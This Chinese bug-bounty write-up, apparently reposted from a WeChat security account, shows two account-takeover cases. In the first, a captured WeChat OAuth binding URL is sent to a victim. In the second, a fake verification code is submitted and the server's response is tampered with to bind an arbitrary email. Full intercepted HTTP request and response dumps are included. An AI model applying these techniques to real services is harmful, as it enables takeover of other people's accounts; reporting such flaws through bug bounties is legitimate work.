No.0
前言
被隐雾老登逼着做分享,水了两个实战交差,大佬轻喷。
No.1
OAuth缺陷接管账号
原理:利用OAuth缺陷进行接管账号,生成自己微信的code,自己的微信绑定别人的账号,造成账号接管。
首先打开要绑定微信的页面
点击去绑定微信
然后打开burp拦截功能,打开手机微信扫码
把这个包的URL记录下来,然后drop掉这个包(这里一定要注意,一定要drop掉,不能自己用了,每个code只能用一次),然后发送URL给受害者,他访问之后账号绑定到我们的微信。
这里用小号当受害者,点击上面的复制的url,受害者点击便成功绑定我的微信,接管账号
No.2
任意邮箱绑定
先注册一个账号。
https://XXXX.com/login?
13XXXXXXX7,使用验证码登录进去。目前只有使用验证码和微信登录。
登录进去来到个人信息页面,
邮箱处显示未绑定,绑定的时候显示,验证下身份,这里不获取验证码,直接随便输入一个验证码。000000
抓包。
POST /api/user/verifyAccount HTTP/2
Host: XXXXX.com
Cookie:XXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://aXXXX
X-Requested-With: XMLHttpRequest
Content-Type: application/json
X-Isuda-App-Locale: zh-CN
Csrf-Token: Pg8sCbu1-vfqE2e3_VPM5DDgRFddtT3TFeic
X-Isuda-Date: 2024-08-10T17:11:48Z
Locale: zh-CN
Content-Length: 40
Origin: https://XXXXXX
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
{"token":"000000","accountType":"phone"}
查看返回包,
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Date: Sat, 10 Aug 2024 17:11:57 GMT
Etag: W/"31-ladpSwO8jzDGrK+NNauEztTj9z4"
Server: nginx
Server-Timing: mid-FaviconMiddleWare; dur=0.022916
Server-Timing: mid-EnsureDBConnected; dur=0.048112999999999996
Server-Timing: mid-FlashMiddleWare; dur=1.3874149999999998
Server-Timing: mid-Authenticate; dur=0.14233099999999999
Server-Timing: mid-CSRFMiddleware; dur=0.132543
Server-Timing: mid-ContextMiddleware; dur=0.31887
Server-Timing: mid-DebugMiddleware; dur=0.008791
Server-Timing: mid-OfflineMiddleWare; dur=1.2282
Server-Timing: mid-OperationLogMiddleWare; dur=0.023925
Server-Timing: mid-XmlMiddleware; dur=0.012435
Server-Timing: mid-CORSMiddleware; dur=0.012601999999999999
Server-Timing: mid-unknown; dur=5.681286999999999
Server-Timing: mid-unknown; dur=0.014254999999999999
Server-Timing: controller; dur=5.5088019371032715; desc="Controller"
Server-Timing: context-get-company; dur=13.881817
Server-Timing: total; dur=18.218661; desc="Total Response Time"
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: X-HTTP-Method, X-HTTP-Method-Override, X-Method-Override
X-Csrf-Token: uNvKgVnU-xmj2ri11jLmfmom9L8XxnlUNz7E
{"status":1,"message":"手机验证码不匹配"}
将返回包修改
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Date: Sat, 10 Aug 2024 17:11:57 GMT
Etag: W/"31-ladpSwO8jzDGrK+NNauEztTj9z4"
Server: nginx
Server-Timing: mid-FaviconMiddleWare; dur=0.022916
Server-Timing: mid-EnsureDBConnected; dur=0.048112999999999996
Server-Timing: mid-FlashMiddleWare; dur=1.3874149999999998
Server-Timing: mid-Authenticate; dur=0.14233099999999999
Server-Timing: mid-CSRFMiddleware; dur=0.132543
Server-Timing: mid-ContextMiddleware; dur=0.31887
Server-Timing: mid-DebugMiddleware; dur=0.008791
Server-Timing: mid-OfflineMiddleWare; dur=1.2282
Server-Timing: mid-OperationLogMiddleWare; dur=0.023925
Server-Timing: mid-XmlMiddleware; dur=0.012435
Server-Timing: mid-CORSMiddleware; dur=0.012601999999999999
Server-Timing: mid-unknown; dur=5.681286999999999
Server-Timing: mid-unknown; dur=0.014254999999999999
Server-Timing: controller; dur=5.5088019371032715; desc="Controller"
Server-Timing: context-get-company; dur=13.881817
Server-Timing: total; dur=18.218661; desc="Total Response Time"
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: X-HTTP-Method, X-HTTP-Method-Override, X-Method-Override
X-Csrf-Token: uNvKgVnU-xmj2ri11jLmfmom9L8XxnlUNz7E
{"status":0,"message":"手机验证码不匹配"}
绕过了第一步,可直接绑定邮箱,
这里随意绑定邮箱即可。
No.3
内心OS
挖洞也一段时间了,学费也回本了,老登一天求我们做分享,怪可怜的,他自己就不能写写嘛。
No.4
原文始发于微信公众号(隐雾安全):分享两个Src实例
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论